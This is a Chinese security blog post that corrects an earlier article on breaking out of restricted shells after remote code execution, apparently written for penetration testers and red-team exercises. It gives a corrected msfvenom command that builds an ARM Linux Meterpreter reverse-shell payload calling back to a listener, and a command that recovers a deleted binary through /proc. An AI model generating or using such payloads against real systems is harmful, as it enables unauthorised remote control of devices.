RCE 遇到受限 shell 的突破文章的错误修改与提醒

admin 2024年7月4日00:04:59评论2 views字数 596阅读1分59秒阅读模式

一、 MSF 生成木马参数错误

0x03 突破受限的shell -> 通过 echo 写文件 -> 1) 生成 Payload 文件 部分存在 Metasploit 木马生成命令错误,将 LHOST 和 LPORT 写成了 RHOST 和 RPORT

RCE 遇到受限 shell 的突破文章的错误修改与提醒

此处命令应该替换为

msfvenom -p linux/armle/meterpreter/reverse_tcp -a armle LHOST=192.168.1.125 LPORT=443 --platform linux -f elf -o payload.elf

导致这部分错误的原因应该是之前测试其他类型的 Payload ,将命令复制过来后,Payload 没用,修改 Payload 后,忘记修改参数

二、 恢复删除文件命令错误

0x02 建立稳定控制 -> 3. Webshell 部分关于恢复被删除的二进制程序这部分描述存在错误

RCE 遇到受限 shell 的突破文章的错误修改与提醒

原文中,我们使用 ls -al /proc/331/fd 的方式查找可恢复的二进制程序,这种方法是不全面的,实际上应该直接执行以下命令

cp /proc/331/exe ./tmp/web

这部分错误的原因是知识量不够,好在有师傅私信我,指正了这个错误,这个错误将在下个版本的 《Linux 应急响应手册》中修正

三、提醒

慎用 resetParam 来重置 web 密码,这可能会导致网络参数都初始化,已经有师傅在演练中因为此而导致掉线

原文始发于微信公众号(NOP Team):RCE 遇到受限 shell 的突破文章的错误修改与提醒

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月4日00:04:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   RCE 遇到受限 shell 的突破文章的错误修改与提醒http://cn-sec.com/archives/2838058.html

发表评论

匿名网友 填写信息